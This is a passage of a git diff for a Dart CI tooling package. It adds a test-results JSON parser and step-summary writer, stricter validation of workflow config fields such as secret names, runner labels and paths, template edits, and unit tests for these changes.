TestResults parseTestResultsJson(String jsonPath) { + final results = TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + Logger.warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; + } + + /// Write a rich test summary block to `$GITHUB_STEP_SUMMARY`. + /// + /// Optional overrides are used by tests to capture deterministic output + /// without requiring CI environment variables. + static void writeTestJobSummary( + TestResults results, + int exitCode, { + String? platformId, + void Function(String markdown)? writeSummary, + }) { + final effectivePlatformId = + platformId ?? + Platform.environment['PLATFORM_ID'] ?? + Platform.environment['RUNNER_NAME'] ?? + Platform.operatingSystem; + final markdown = _buildTestJobSummaryMarkdown( + results: results, + exitCode: exitCode, + platformId: effectivePlatformId, + ); + final writer = writeSummary ?? StepSummary.write; + writer(markdown); + } + + static String _buildTestJobSummaryMarkdown({ + required TestResults results, + required int exitCode, + required String platformId, + }) { + final buf = StringBuffer(); + + buf.writeln('## Test Results — ${StepSummary.escapeHtml(platformId)}'); + buf.writeln(); + + if (!results.parsed) { + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + return buf.toString(); + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + final hasFailingStatus = results.failed > 0 || exitCode != 0; + + if (!hasFailingStatus) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else if (results.failed > 0) { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> Tests exited with code $exitCode despite no structured test failures.'); + } + buf.writeln(); + + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${StepSummary.escapeHtml(f.name)}$durStr'); + buf.writeln(); + + if (f.error.isNotEmpty) { + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + final stack = f.stackTrace.length > 1500 + ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' + : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln('_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._'); + buf.writeln(); + } + } + + buf.writeln('---'); + buf.writeln(StepSummary.artifactLink(':package: View full test logs')); + buf.writeln(); + return buf.toString(); + } + + static String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; + } +} diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index b86c3de..130ff2c 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -57,6 +57,27 @@ const Set _knownFeatureKeys = { const Set _knownWebTestKeys = {'concurrency', 'paths'}; +/// Safe identifier for env vars and GitHub secrets (e.g. API_KEY, GITHUB_TOKEN). +/// Must start with letter or underscore, then alphanumeric/underscore only. +bool _isSafeSecretIdentifier(String s) { + return RegExp(r'^[A-Za-z_][A-Za-z0-9_]*$').hasMatch(s); +} + +/// Runner label must not contain newlines, control chars, or YAML-injection chars. +/// Allows alphanumeric, underscore, hyphen, dot (e.g. ubuntu-latest, runtime-ubuntu-24.04-x64). +bool _isSafeRunnerLabel(String s) { + if (s.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) return false; + if (RegExp('[{}:\[\]#@|>&*"\'\\\$]').hasMatch(s)) return false; + return RegExp(r'^[A-Za-z0-9_.-]+$').hasMatch(s); +} + +/// Sub-package names are rendered into YAML and shell-facing messages. +/// Keep them to a conservative character set. +bool _isSafeSubPackageName(String s) { + if (s.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) return false; + return RegExp(r'^[A-Za-z0-9_.-]+$').hasMatch(s); +} + /// Renders CI workflow YAML from a Mustache skeleton template and config.json. /// /// The skeleton uses `<% %>` delimiters (set via `{{=<% %>=}}` at the top) @@ -182,8 +203,8 @@ class WorkflowGenerator { return { 'tooling_version': toolingVersion, - 'dart_sdk': ciConfig['dart_sdk'] ?? '3.9.2', - 'line_length': '${ciConfig['line_length'] ?? 120}', + 'dart_sdk': ciConfig['dart_sdk'] as String, + 'line_length': _resolveLineLength(ciConfig['line_length']), 'pat_secret': ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', // Feature flags @@ -209,7 +230,7 @@ class WorkflowGenerator { 'sub_packages': subPackages .whereType>() .where((sp) => sp['name'] != null && sp['path'] != null) - .map((sp) => {'name': sp['name'], 'path': sp['path']}) + .map((sp) => {'name': (sp['name'] as String).trim(), 'path': (sp['path'] as String).trim()}) .toList(), // Platform support @@ -231,6 +252,15 @@ class WorkflowGenerator { return '1'; } + static String _resolveLineLength(dynamic raw) { + if (raw is int) return '$raw'; + if (raw is String) { + final parsed = int.tryParse(raw.trim()); + if (parsed != null) return '$parsed'; + } + return '120'; + } + /// Shared filter: extracts valid, normalized web test paths from config. static List _filteredWebTestPaths(Map ciConfig) { final webTestConfig = _getWebTestConfig(ciConfig); @@ -346,14 +376,53 @@ class WorkflowGenerator { final secrets = ciConfig['secrets']; if (secrets != null && secrets is! Map) { errors.add('ci.secrets must be an object, got ${secrets.runtimeType}'); + } else if (secrets is Map) { + for (final entry in secrets.entries) { + final key = entry.key; + final value = entry.value; + if (key is! String) { + errors.add('ci.secrets keys must be strings, got ${key.runtimeType}'); + continue; + } + if (!_isSafeSecretIdentifier(key)) { + errors.add('ci.secrets key "$key" must be a safe identifier (e.g. API_KEY, GITHUB_TOKEN)'); + } + if (value is String) { + if (!_isSafeSecretIdentifier(value)) { + errors.add('ci.secrets["$key"] value "$value" must be a safe secret name (e.g. MY_SECRET)'); + } + } + } } final pat = ciConfig['personal_access_token_secret']; if (pat != null && (pat is! String || pat.isEmpty)) { errors.add('ci.personal_access_token_secret must be a non-empty string'); + } else if (pat is String && !_isSafeSecretIdentifier(pat)) { + errors.add('ci.personal_access_token_secret "$pat" must be a safe identifier (e.g. GITHUB_TOKEN)'); } final lineLength = ciConfig['line_length']; if (lineLength != null && lineLength is! int && lineLength is! String) { errors.add('ci.line_length must be a number or string, got ${lineLength.runtimeType}'); + } else if (lineLength is int) { + if (lineLength < 1 || lineLength > 10000) { + errors.add('ci.line_length must be between 1 and 10000, got $lineLength'); + } + } else if (lineLength is String) { + final trimmed = lineLength.trim(); + if (trimmed.isEmpty) { + errors.add('ci.line_length string must not be empty or whitespace-only'); + } else if (trimmed != lineLength) { + errors.add('ci.line_length must not have leading/trailing whitespace'); + } else if (lineLength.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) { + errors.add('ci.line_length must not contain newlines or control characters'); + } else { + final parsed = int.tryParse(lineLength); + if (parsed == null) { + errors.add('ci.line_length string must be numeric, got "$lineLength"'); + } else if (parsed < 1 || parsed > 10000) { + errors.add('ci.line_length must be between 1 and 10000, got $lineLength'); + } + } } final platforms = ciConfig['platforms']; if (platforms != null) { @@ -389,6 +458,10 @@ class WorkflowGenerator { final pathValue = sp['path']; if (name is! String || name.trim().isEmpty) { errors.add('ci.sub_packages[].name must be a non-empty string'); + } else if (name != name.trim()) { + errors.add('ci.sub_packages[].name must not have leading/trailing whitespace'); + } else if (!_isSafeSubPackageName(name)) { + errors.add('ci.sub_packages[].name contains unsupported characters: "$name"'); } else if (!seenNames.add(name)) { errors.add('ci.sub_packages contains duplicate name "$name"'); } @@ -419,6 +492,16 @@ class WorkflowGenerator { errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo'); continue; } + if (normalized == '.') { + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not be repo root (".")'); + continue; + } + if (normalized.startsWith('-')) { + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must not start with "-" (reserved for CLI options)', + ); + continue; + } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { errors.add( 'ci.sub_packages["${name is String ? name : '?'}"].path contains unsupported characters: "$pathValue"', @@ -449,6 +532,10 @@ class WorkflowGenerator { } if (value is! String || value.trim().isEmpty) { errors.add('ci.runner_overrides["$key"] must be a non-empty string'); + } else if (value != value.trim()) { + errors.add('ci.runner_overrides["$key"] must not have leading/trailing whitespace'); + } else if (!_isSafeRunnerLabel(value.trim())) { + errors.add('ci.runner_overrides["$key"] must not contain newlines, control chars, or unsafe YAML chars'); } } } @@ -508,6 +595,14 @@ class WorkflowGenerator { errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); continue; } + if (normalized == '.') { + errors.add('ci.web_test.paths[$i] must not be repo root (".")'); + continue; + } + if (normalized.startsWith('-')) { + errors.add('ci.web_test.paths[$i] must not start with "-" (reserved for CLI options)'); + continue; + } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); continue; diff --git a/lib/src/triage/utils/config.dart b/lib/src/triage/utils/config.dart index edbbcd2..4cd21d1 100644 --- a/lib/src/triage/utils/config.dart +++ b/lib/src/triage/utils/config.dart @@ -173,6 +173,15 @@ class TriageConfig { .toList(); } + /// Optional allowlist of organizations considered for cross-repo workflows. + List get crossRepoOrgs => _strList(['cross_repo', 'orgs'], []); + + /// Whether automatic cross-repo discovery is enabled. + bool get crossRepoDiscoveryEnabled => _bool(['cross_repo', 'discovery', 'enabled'], true); + + /// Organizations used for auto-discovery; falls back to [crossRepoOrgs]. + List get crossRepoDiscoverySearchOrgs => _strList(['cross_repo', 'discovery', 'search_orgs'], crossRepoOrgs); + // ═══════════════════════════════════════════════════════════════════════════ // Labels (REQUIRED -- no hardcoded package-specific area labels) // ═══════════════════════════════════════════════════════════════════════════ diff --git a/templates/config.json b/templates/config.json index 5fa7efc..b5de060 100644 --- a/templates/config.json +++ b/templates/config.json @@ -14,7 +14,7 @@ "organization": "", "projects": [], "scan_on_pre_release": true, - "recent_errors_hours": 1440 + "recent_errors_hours": 168 }, "release": { "pre_release_scan_sentry": true, @@ -65,7 +65,7 @@ "ci": { "dart_sdk": "3.9.2", "line_length": 120, - "personal_access_token_secret": "TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN", + "personal_access_token_secret": "GITHUB_TOKEN", "features": { "proto": false, "lfs": false, @@ -78,17 +78,11 @@ }, "secrets": {}, "sub_packages": [], - "_comment_web_test": "Optional: web_test runs 'dart test -p chrome' in a standalone ubuntu job. Requires 'web_test: true' in features.", - "web_test": { - "concurrency": 1, - "paths": [] - }, + "_comment_web_test": "Optional: when features.web_test is true, set web_test to { \"concurrency\": 1, \"paths\": [] } (or leave as {} to use defaults).", + "web_test": {}, "_comment_platforms": "Optional: CI platform matrix. When 2+ entries are provided, CI splits into analyze + matrix test jobs.", "platforms": ["ubuntu-x64", "ubuntu-arm64", "macos-arm64", "macos-x64", "windows-x64", "windows-arm64"], "_comment_runner_overrides": "Optional: override platform IDs to custom runs-on labels (e.g. org-managed GitHub-hosted runners). Keys must match ci.platforms entries.", - "runner_overrides": { - "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core", - "windows-arm64": "runtime-windows-11-arm64-208gb-64core" - } + "runner_overrides": {} } } diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index da67d3e..939b08c 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -201,7 +201,6 @@ jobs: set -o pipefail mkdir -p "$TEST_LOG_DIR" dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" - exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs @@ -395,6 +394,14 @@ jobs: key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + # ── shared:proto-setup ── keep in sync with single_platform ── +<%#proto%> + - name: Install protoc + uses: arduino/setup-protoc@v3.0.0 + + - run: dart pub global activate protoc_plugin 25.0.0 + +<%/proto%> # ── shared:pub-get ── keep in sync with single_platform ── - run: dart pub get env: @@ -416,7 +423,6 @@ jobs: set -o pipefail mkdir -p "$TEST_LOG_DIR" dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" - exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs PLATFORM_ID: ${{ matrix.platform_id }} @@ -516,7 +522,7 @@ jobs: run: dart run build_runner build --delete-conflicting-outputs <%/build_runner%> - # ── shared:proto-verify ── keep in sync with single_platform / multi_platform analyze ── + # ── shared:proto-verify ── keep in sync with single_platform / multi_platform ── <%#proto%> - name: Verify proto files run: dart run runtime_ci_tooling:manage_cicd verify-protos @@ -524,7 +530,7 @@ jobs: <%/proto%> - name: Setup Chrome id: setup-chrome - uses: browser-actions/setup-chrome@v2 + uses: browser-actions/setup-chrome@4f8e94349a351df0f048634f25fec36c3c91eded # v2.1.1 with: install-dependencies: true @@ -533,7 +539,7 @@ jobs: <%#web_test_has_paths%> - name: Web Test - run: dart test -p chrome --concurrency=<%web_test_concurrency%> <%web_test_paths%> + run: dart test -p chrome --concurrency=<%web_test_concurrency%> -- <%web_test_paths%> env: CHROME_EXECUTABLE: ${{ steps.setup-chrome.outputs.chrome-path }} <%/web_test_has_paths%> @@ -545,7 +551,7 @@ jobs: <%/web_test_has_paths%> - name: Upload web test artifacts on failure - if: failure() + if: failure() && hashFiles('**/test-results/**') != '' uses: actions/upload-artifact@v4 with: name: web-test-artifacts diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart new file mode 100644 index 0000000..d8d9531 --- /dev/null +++ b/test/cli_utils_test.dart @@ -0,0 +1,404 @@ +import 'dart:io'; + +import 'package:path/path.dart' as p; +import 'package:test/test.dart' hide TestFailure; + +import 'package:runtime_ci_tooling/src/cli/utils/repo_utils.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; + +bool _canCreateSymlink() { + final tempDir = Directory.systemTemp.createTempSync('symlink_probe_'); + try { + final target = File(p.join(tempDir.path, 'target.txt')); + target.writeAsStringSync('ok'); + final linkPath = p.join(tempDir.path, 'link.txt'); + Link(linkPath).createSync(target.path); + return RepoUtils.isSymlinkPath(linkPath); + } on FileSystemException { + return false; + } finally { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + } +} + +void main() { + final symlinksSupported = _canCreateSymlink(); + + group('RepoUtils.resolveTestLogDir', () { + late Directory tempDir; + late String repoRoot; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('repo_utils_resolve_'); + repoRoot = tempDir.path; + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('returns default path when TEST_LOG_DIR is unset', () { + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {}, + ); + expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); + }); + + test('returns default path when TEST_LOG_DIR is empty/whitespace', () { + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': ' '}, + ); + expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); + }); + + test('throws when TEST_LOG_DIR contains control characters', () { + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': '/tmp/logs\nbad'}, + ), + throwsA(isA()), + ); + }); + + test('throws when TEST_LOG_DIR is relative', () { + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': 'relative/path'}, + ), + throwsA(isA()), + ); + }); + + test('throws when TEST_LOG_DIR is outside RUNNER_TEMP', () { + final runnerTemp = p.join(repoRoot, 'runner-temp'); + final outside = p.join(repoRoot, 'outside', 'logs'); + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, + ), + throwsA(isA()), + ); + }); + + test('accepts TEST_LOG_DIR inside RUNNER_TEMP', () { + final runnerTemp = p.join(repoRoot, 'runner-temp'); + final inside = p.join(runnerTemp, 'logs'); + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': inside}, + ); + expect(resolved, equals(inside)); + }); + }); + + group('RepoUtils filesystem safety', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('repo_utils_fs_'); + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('ensureSafeDirectory creates a missing normal directory', () { + final dirPath = p.join(tempDir.path, 'logs'); + RepoUtils.ensureSafeDirectory(dirPath); + expect(Directory(dirPath).existsSync(), isTrue); + expect(RepoUtils.isSymlinkPath(dirPath), isFalse); + }); + + test('writeFileSafely writes to a normal file path', () { + final filePath = p.join(tempDir.path, 'stdout.log'); + RepoUtils.writeFileSafely(filePath, 'hello world'); + expect(File(filePath).readAsStringSync(), equals('hello world')); + }); + + test('writeFileSafely appends when FileMode.append is used', () { + final filePath = p.join(tempDir.path, 'stdout.log'); + RepoUtils.writeFileSafely(filePath, 'hello'); + RepoUtils.writeFileSafely(filePath, ' world', mode: FileMode.append); + expect(File(filePath).readAsStringSync(), equals('hello world')); + }); + + test( + 'ensureSafeDirectory rejects symlink-backed directories', + skip: !symlinksSupported, + () { + final targetDir = Directory(p.join(tempDir.path, 'target')) + ..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect( + () => RepoUtils.ensureSafeDirectory(linkDirPath), + throwsA(isA()), + ); + }, + ); + + test( + 'writeFileSafely rejects symlink file targets', + skip: !symlinksSupported, + () { + final targetFile = File(p.join(tempDir.path, 'target.txt')) + ..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect( + () => RepoUtils.writeFileSafely(linkPath, 'new content'), + throwsA(isA()), + ); + }, + ); + }); + + group('TestResultsUtil.parseTestResultsJson', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('test_results_parse_'); + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('returns unparsed empty results when file does not exist', () { + final missingPath = p.join(tempDir.path, 'missing.json'); + final results = TestResultsUtil.parseTestResultsJson(missingPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }); + + test('parses pass/fail/skipped counts and failure details', () { + final jsonPath = p.join(tempDir.path, 'results.json'); + File(jsonPath).writeAsStringSync( + [ + '{"type":"testStart","test":{"id":1,"name":"passes"},"time":100}', + '{"type":"testDone","testID":1,"result":"success","hidden":false,"skipped":false,"time":120}', + '{"type":"testStart","test":{"id":2,"name":"fails"},"time":130}', + '{"type":"print","testID":2,"message":"hello from test"}', + '{"type":"error","testID":2,"error":"boom","stackTrace":"trace line"}', + '{"type":"testDone","testID":2,"result":"failure","hidden":false,"skipped":false,"time":170}', + '{"type":"testStart","test":{"id":3,"name":"skipped"},"time":180}', + '{"type":"testDone","testID":3,"result":"success","hidden":false,"skipped":true,"time":190}', + '{"type":"done","time":200}', + ].join('\n'), + ); + + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, equals(1)); + expect(results.failed, equals(1)); + expect(results.skipped, equals(1)); + expect(results.totalDurationMs, equals(200)); + expect(results.failures, hasLength(1)); + expect(results.failures.first.name, equals('fails')); + expect(results.failures.first.error, contains('boom')); + expect(results.failures.first.stackTrace, contains('trace line')); + expect(results.failures.first.printOutput, contains('hello from test')); + expect(results.failures.first.durationMs, equals(40)); + }); + + test('ignores malformed JSON lines and hidden test entries', () { + final jsonPath = p.join(tempDir.path, 'results.json'); + File(jsonPath).writeAsStringSync( + [ + '{"type":"testStart","test":{"id":10,"name":"hidden fail"},"time":10}', + '{bad json line', + '{"type":"error","testID":10,"error":"hidden boom","stackTrace":"hidden trace"}', + '{"type":"testDone","testID":10,"result":"failure","hidden":true,"skipped":false,"time":20}', + '{"type":"testStart","test":{"id":11,"name":"visible pass"},"time":21}', + '{"type":"testDone","testID":11,"result":"success","hidden":false,"skipped":false,"time":30}', + '{"type":"done","time":30}', + ].join('\n'), + ); + + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, equals(1)); + expect(results.failed, equals(0)); + expect(results.failures, isEmpty); + }); + }); + + group('TestResultsUtil.writeTestJobSummary', () { + TestResults _parsed({ + required int passed, + required int failed, + required int skipped, + int durationMs = 500, + }) { + final results = TestResults() + ..parsed = true + ..passed = passed + ..failed = failed + ..skipped = skipped + ..totalDurationMs = durationMs; + return results; + } + + test( + 'emits NOTE when parsed results are successful and exit code is 0', + () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }, + ); + + test( + 'emits CAUTION when exit code is non-zero even if failed count is zero', + () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests exited with code 1 despite no structured test failures.', + ), + ); + }, + ); + + test('emits CAUTION for unparsed results with non-zero exit code', () { + String? summary; + final results = TestResults(); // parsed=false by default + + TestResultsUtil.writeTestJobSummary( + results, + 7, + platformId: 'runner', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests failed (exit code 7) — no structured results available.', + ), + ); + }); + + test('emits NOTE for unparsed results with zero exit code', () { + String? summary; + final results = TestResults(); // parsed=false by default + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'runner', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('> [!NOTE]')); + expect( + summary!, + contains( + 'Tests passed (exit code 0) — no structured results available.', + ), + ); + }); + + test('emits CAUTION when parsed results contain failures', () { + String? summary; + final results = _parsed(passed: 1, failed: 1, skipped: 0); + results.failures.add( + TestFailure( + name: 'failing test', + error: 'boom', + stackTrace: 'trace', + printOutput: '', + durationMs: 12, + ), + ); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('> [!CAUTION]')); + expect(summary!, contains('1 of 2 tests failed')); + expect(summary!, contains('### Failed Tests')); + expect(summary!, contains('failing test')); + }); + + test('truncates failure details after 20 entries in summary', () { + String? summary; + final results = _parsed(passed: 0, failed: 25, skipped: 0); + for (var i = 0; i < 25; i++) { + results.failures.add( + TestFailure( + name: 'failing test $i', + error: 'boom $i', + stackTrace: 'trace $i', + printOutput: '', + durationMs: i, + ), + ); + } + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect( + summary!, + contains( + '_...and 5 more failures. See test logs artifact for full details._', + ), + ); + expect(summary!, isNot(contains('failing test 24'))); + }); + }); +} diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 7dbb9f9..2b0c8a9 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -2,6 +2,7 @@ import 'dart:convert'; import 'dart:io'; import 'package:test/test.dart'; +import 'package:yaml/yaml.dart'; import 'package:runtime_ci_tooling/src/cli/utils/workflow_generator.dart'; @@ -270,6 +271,34 @@ void main() { ); expect(errors.where((e) => e.contains('secrets')), isEmpty); }); + + test('secrets key with hyphen produces error (unsafe identifier)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API-KEY': 'SOME_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets key starting with digit produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'1API_KEY': 'SOME_SECRET'}), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('secrets value with hyphen produces error (unsafe secret name)', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API_KEY': 'SOME-SECRET'}), + ); + expect(errors, anyElement(contains('safe secret name'))); + }); + + test('secrets key and value with underscore pass', () { + final errors = WorkflowGenerator.validate( + _validConfig(secrets: {'API_KEY': 'MY_SECRET_NAME'}), + ); + expect(errors.where((e) => e.contains('secrets')), isEmpty); + }); }); // ---- personal_access_token_secret ---- @@ -301,6 +330,30 @@ void main() { isEmpty, ); }); + + test('pat with hyphen produces error (unsafe identifier)', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: 'MY-PAT'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('pat with special chars produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: r'MY_PAT$'), + ); + expect(errors, anyElement(contains('safe identifier'))); + }); + + test('pat GITHUB_TOKEN passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(pat: 'GITHUB_TOKEN'), + ); + expect( + errors.where((e) => e.contains('personal_access_token_secret')), + isEmpty, + ); + }); }); // ---- line_length ---- @@ -328,6 +381,54 @@ void main() { final errors = WorkflowGenerator.validate(_validConfig()); expect(errors.where((e) => e.contains('line_length')), isEmpty); }); + + test('string line_length "abc" produces error (must be numeric)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: 'abc'), + ); + expect(errors, anyElement(contains('must be numeric'))); + }); + + test('string line_length with leading/trailing whitespace produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: ' 120 '), + ); + expect(errors, anyElement(contains('whitespace'))); + }); + + test('string line_length with embedded 